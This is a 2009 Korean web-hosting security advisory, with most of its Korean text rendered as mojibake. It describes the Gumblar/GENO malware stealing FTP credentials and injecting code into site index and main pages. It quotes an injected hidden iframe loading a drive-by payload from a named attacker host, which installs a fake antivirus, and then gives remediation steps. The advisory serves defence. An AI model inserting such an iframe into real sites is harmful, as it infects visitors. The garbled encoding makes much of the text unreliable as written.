Home | Data Center | Contact US | Login

Á¦¸ñ GENO ¾Ç¼ºÄÚµå ftp°èÁ¤µµ¿ëÅëÇÑ index, main º¯Á¶
ÀÛ¼ºÀÏ 2009-08-28 14:28:00

Á¦¸ñ : GENO ¾Ç¼ºÄÚµå ftp°èÁ¤µµ¿ëÅëÇÑ index, main º¯Á¶
 

³»¿ë :
ÃÖ±Ù °Ëºí·¯(Gumblar) ȤÀº GENO ¶ó°í ºÒ¸®´Â ¾Ç¼ºÄڵ尡 ±Þ¼ÓÈ÷ ÀüÆĵǰí ÀÖ½À´Ï´Ù.
ÇØ´ç ¾Ç¼ºÄÚµå´Â ¾îµµºñ(Adobe)»çÀÇ ¾ÆÅ©·Î¹îÀ̳ª Ç÷¡½¬ÀÇ º¸¾È ÆÐÄ¡°¡ µÇÁö ¾ÊÀº PC°¡ ƯÁ¤ À¥ »çÀÌÆ®¸¦ ¿­±â¸¸ Çصµ °¨¿°µÇ´Â 'µå¶óÀÌºê ¹ÙÀÌ ´Ù¿î·Îµå' ¹æ½ÄÀ¸·Î ÀüÆĵǰí ÀÖ¾î °¨¿°¼Óµµ°¡ ¸Å¿ì ºü¸¨´Ï´Ù.
¶ÇÇÑ °¨¿°µÈ PC ÀÌ¿ëÀÚ°¡ À¥»çÀÌÆ®ÀÇ ÆÄÀÏÀ» °ü¸®ÇÏ´Â FTP ÇÁ·Î±×·¥À» °¡Áö°í ÀÖÀ» °æ¿ì ID¿Í ºñ¹Ð¹øÈ£¸¦ »©³» ÇØ´ç À¥»çÀÌÆ®ÀÇ index , main µîÀÇ À̸§À» °¡Áø html, php ÆÄÀϵéÀ» º¯Á¶Çؼ­¾Ç¼ºÄڵ带 ´Ù¿î¹Þ´Â Äڵ带 ½É¾î³õ°Ô µË´Ï´Ù.
 

Áõ»ó :
º» Çö»óÀº »çÀÌÆ®°¡ ÃʱâÈ­¸éÀÌ ´À·ÁÁö°Å³ª, È­¸éÀÌ Æ²¾îÁö°Å³ª, °ü¸®ÀÚ¸ðµå Á¢±Ù½Ã ¿¡·¯¸Þ½ÃÁö Ãâ·Â µî À» º¸½Ç ¼ö ÀÖ½À´Ï´Ù.
½ÇÁ¦ index.phpÆÄÀÏÀÇ ÁÖ¿ä ºÎºÐÀÔ´Ï´Ù.
<body><iframe src="http://3e0.ru:8080/index.php" width=129 height=172 style="visibility: hidden"></iframe>
<p> ÆäÀÌÁö¸¦ º¸·Á¸é, ÇÁ·¹ÀÓÀ» º¼ ¼ö ÀÖ´Â ºê¶ó¿ìÀú°¡ ÇÊ¿äÇÕ´Ï´Ù. </p>
</bo
»óÀ§¿Í °°ÀÌ index.php ³»¿ëÀÌ º¯°æµË´Ï´Ù. ¸Ç ¾Æ·¡ </body>űװ¡ Á¤»óÀûÀ¸·Î ÀúÀåµÇÁö ¾Ê°í, 3e0.ru »çÀÌÆ®·Î Á¢¼Ó½Ã¿¡´Â activeX°¡ »ç¿ëÀÚ°¡ ¸ð¸£°Ô ¼³Ä¡µÇ°í 10ÃÊ µÚ¿¡ ÀÚµ¿À¸·Î ¸®ºÎÆÃÀ» ½Ãŵ´Ï´Ù.
activex·Î ¼³Ä¡µÈ ÆÄÀÏÀº ¿äÁò ¶ß°í ÀÖ´Â °¡Â¥ ¹é½Å Home Antivirus 2010 °¡ ÀÚµ¿À¸·Î ¼³Ä¡µÇµµ·Ï ÇÏ´Â °ÍÀÔ´Ï´Ù.
 
PC »ç¿ëÀÚ°¡ ¾Ç¼ºÄÚµå ÆÄÀÏÀ» »èÁ¦ÇÑ µÚ¿¡µµ PC¸¦ ²°´Ù°¡ ÄÓ ¶§ ¾Ç¼ºÄڵ尡 À缳ġ¸¦ ½ÃµµÇÏ´Â °¡Â¥¹é½Å ¡®Home Antivirus 2010Àº ¸¶ÀÌÅ©·Î½ºÇÁÆ® ¿î¿µÃ¼Á¦(OS) À©µµÀÇ Á¤»ó ½Ã½ºÅÛ ÆÄÀÏÀÎ ntfs.sys ÆÄÀÏÀ» º¯Á¶ÇØ ¾Ç¼ºÄÚµå À缳ġ¸¦ ½ÇÇàÇÕ´Ï´Ù.
°¡Â¥¹é½Å¿¡ °¨¿°µÈ °æ¿ì¿¡´Â PC ¸ð´ÏÅÍÀÇ ¿À¸¥ÂÊ ¾Æ·¡ ºÎºÐ¿¡ ¡®´ç½ÅÀÇ ÄÄÇ»ÅÍ°¡ ¾Ç¼ºÄڵ忡 °¨¿°µÆ´Ù(Your Computer is infected!)¡¯´Â ÇãÀ§ °æ°íâÀÌ ¶å´Ï´Ù.
ÇÏÁö¸¸ ÀÌ °æ°íâÀº °¡Â¥ÀÔ´Ï´Ù. »ç¿ëÀÚÀÇ PC ³»¿¡ ¾²·¹±â ÆÄÀϵéÀ» ¸¶±¸ÀâÀÌ·Î »ý¼º½ÃŲ ÈÄ ±×°ÍµéÀ» ã¾Æ Áø´Ü¡¤Ä¡·áÇÏ´Â °úÁ¤¿¡¼­ ´ë±Ý°áÁ¦¸¦ ¿ä±¸ÇÏ´Â ¼ö¹ýÀÔ´Ï´Ù. °æ°íâÀÇ ¸»¸¸ ¹Ï°í Ä¡·á¸¦ À§ÇØ ¡®Remove¡¯¸¦ Ŭ¸¯Çϰųª ÇãÀ§ °æ°í Æ˾÷âÀ» Ŭ¸¯ÇÏ¸é °áÁ¦ ÆäÀÌÁö·Î ¿¬°áµË´Ï´Ù.
 
½ÇÁúÀûÀ¸·Î Your Computer is infected!°¡ ¹«½¼ ÇÁ·Î¼¼½ºÀÎÁö windows ÀÛ¾÷°ü¸®ÀÚ¸¦ ¶ç¿öµµ À̸§ÀÌ ³ªÅ¸³ªÁö ¾Êµµ·Ï µÇ¾îÀ־ ÀÏ¹Ý À¯ÀúµéÀº È®ÀÎÀ» Á¦´ë·Î ÇÒ ¼ö ¾ø°Ô µË´Ï´Ù.
 

ÇØ°á ¹æ¹ý :
1) ÇØ´ç pc ¿¡¼­ ¾Ç¼ºÄڵ带 Á¦°ÅÇØ¾ß ÇÕ´Ï´Ù. Á¦°Å°¡ ¾î·Á¿ï °æ¿ì OS ¸¦ À缳ġÇØ¾ß ÇÕ´Ï´Ù.
¾Ç¼ºÄڵ尡 Á¦°ÅµÇÁö ¾ÊÀº »óÅ¿¡¼­ ´Ü¼øÈ÷ ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ûä ftp Á¢¼ÓÀ» ÇÏ°Ô µÇ¸é Áö¼ÓÀûÀ¸·Î ID ¿Í ºñ¹Ð¹øÈ£°¡ À¯ÃâµÇ¾î¼­ »çÀÌÆ® º¯Á¶°¡ Áö¼ÓµË´Ï´Ù.
ºÎµæÀÌ ÇÏ°Ô ¾Ç¼ºÄÚµå Á¦°ÅµÇ±â Àü¿¡ ±ÞÇÏ°Ô ¼öÁ¤À» ÇϽǷÁ°í ÇÑ´Ù¸é ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ù½Ã°í ftp »ç¿ëÀ» ¸·°í, ´ë½Å sftp ¸¦ »ç¿ëÇØ¾ß ÇÕ´Ï´Ù.
sftp ´Â ÇâÈÄ µ¿ÀÏ ¹®Á¦ ¿¹¹æÀ» À§Çؼ­¶óµµ ftp ´ë½Å °è¼Ó »ç¿ëÀ» ÇϽǰÍÀ» ±ÇÀåÇص帳´Ï´Ù.
 
2) Microsoft¿¡¼­ Á¦°øÇÏ´Â ÃֽŠº¸¾È ÆÐÄ¡¸¦ Àû¿ëÇÏ¿© ÀÎÅÍ³Ý ÀͽºÇ÷η¯¿¡ Á¸ÀçÇÏ´Â Ãë¾àÁ¡ Á¦°Å¸¦ ÇÕ´Ï´Ù.
 
3) ¾îµµºñ ÃֽŠ¹öÀü ¾÷µ¥ÀÌÆ® :  ¾îµµºñ ¸®´õ ½ÇÇà ÈÄ »ó´Ü ¸Þ´º¿¡¼­ [µµ¿ò¸»] – [¾÷µ¥ÀÌÆ® È®ÀÎ]À» ÅëÇØ ÃֽŠ¹öÀüÀÎÁö È®ÀÎ ÈÄ ÇÊ¿ä ½Ã ¾÷µ¥ÀÌÆ® ÇÕ´Ï´Ù.
¾îµµºñ ¾÷µ¥ÀÌÆ® »çÀÌÆ® :  http://www.adobe.com/kr/downloads/updates/
 
4) ¾îµµºñ Ç÷¡½¬ Ç÷¹À̾î(Adobe Flash Player)¸¦ ÃֽŠ¹öÀüÀ¸·Î ¾÷µ¥ÀÌÆ® : À©µµ¿ì ½Ã½ºÅÛ (º¸Åë C:\Windows\System32) Macromed ÀÇ Flash Æú´õ·Î À̵¿ÇÏ¿©FlashUtil9?.exe (e,f µî ¾ËÆĺª) ½ÇÇàÇÕ´Ï´Ù.
 
5) ¹é½Å »ç¿ë ¹× ÃֽŠ¿£Áø ¾÷µ¥ÀÌÆ® (½Ç½Ã°£ °¨½Ã ±â´É »ç¿ë) : V3(V3 IS, V3 365, V3 Lite ¹× V3 Net for Server Á¦Ç°±º)¿¡¼­´Â 2009.05.21.00 ¿£Áø¿¡¼­ºÎÅÍ Áø´Ü ¹× Ä¡·á °¡´ÉÇÕ´Ï´Ù.
 
6) »çÀÌÆ®°¡µå(SiteGuard) ¼³Ä¡ ¹× Àû¿ë : À§Çè À¥»çÀÌÆ® »çÀü Â÷´Ü ÇÁ·Î±×·¥ÀÎ »çÀÌÆ®°¡µå ¼³Ä¡·Î ¾ÇÀÇÀûÀÎ À¥ »çÀÌÆ®¿¡ ´ëÇÑ °Ë»ç ¹× Â÷´ÜÇÕ´Ï´Ù.
 
7) ¼­¹ö³» º¯Á¶µÈ html, php ÆÄÀÏ¿¡¼­ ´ÙÀ½°ú °°Àº ÇüÅÂÀÇ Äڵ带 Á¦°ÅÇϽñ⠹ٶø´Ï´Ù.
< iframe src = " http://xxxxxxxxxxx.cn:8080/index.php" width=198 height=141 >
  MS IIS FTP ¼­ºñ½ºÀÇ ¿ø°ÝÄÚµå½ÇÇà Ãë¾àÁ¡ ÁÖÀÇ
  [À©µµ¿ìÁî º¸¾È] 2009³â 8¿ù Microsoft º¸¾È ¾÷µ¥ÀÌÆ®






ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ
ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ